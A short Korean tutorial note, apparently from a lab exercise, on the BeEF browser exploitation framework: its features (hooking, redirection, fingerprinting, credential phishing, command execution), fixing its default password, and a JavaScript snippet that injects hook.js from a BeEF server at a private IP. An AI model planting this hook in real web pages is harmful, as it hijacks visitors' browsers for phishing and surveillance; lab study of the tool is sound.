📎 주요 기능 1) 브라우저 후킹 (Hooking) : 사용자가 악성 스크립트가 포함된 웹페이지를 열면 브라우저가 BeEF 서버에 연결 2) 모듈 기반 공격 - 리다이렉션: 사용자를 임의의 웹페지로 강제로 이동시킴 - 브라우저 정보 수집: 사용자의 브라우저 버전, 운영체제, IP 주소 등 기본 정보 탐지 - 피싱: 로그인 페이지를 위조해 피해자의 인증 정보 수집 가능 - XSS, 클릭재킹 테스트: 웹 사이트가 공격에 얼마나 취약한지 확인 3) 실시간 제어 및 명령 실행 : 후킹된 브라우저에서 실시간으로 명령을 실행할 수 있으며,사용자가 무엇을 클릭하는지 추적하거나 화면을 캡쳐하는 것도 가능
└─$ sudo ./beef
[16:42:09][!] ERROR: Don't use default username and password!
[16:42:09] |_ Change the beef.credentials.passwd in /etc/beef-xss/config.yaml
/etc/beef-xss/config.yaml 파일의 비밀번호 값을 수정해줘야 함!
vi /etc/beef-xss/config.yaml
아래의 초기 비밀번호 값을 변경해준 후
sudo ./beef
실행해주기
📌 웹 취약점 공격 시도
✔️ 웹 페이지에 스크립트 삽입
var script = document.createElement('script');
script.src = 'http://192.168.133.138:3000/hook.js';
document.head.appendChild(script);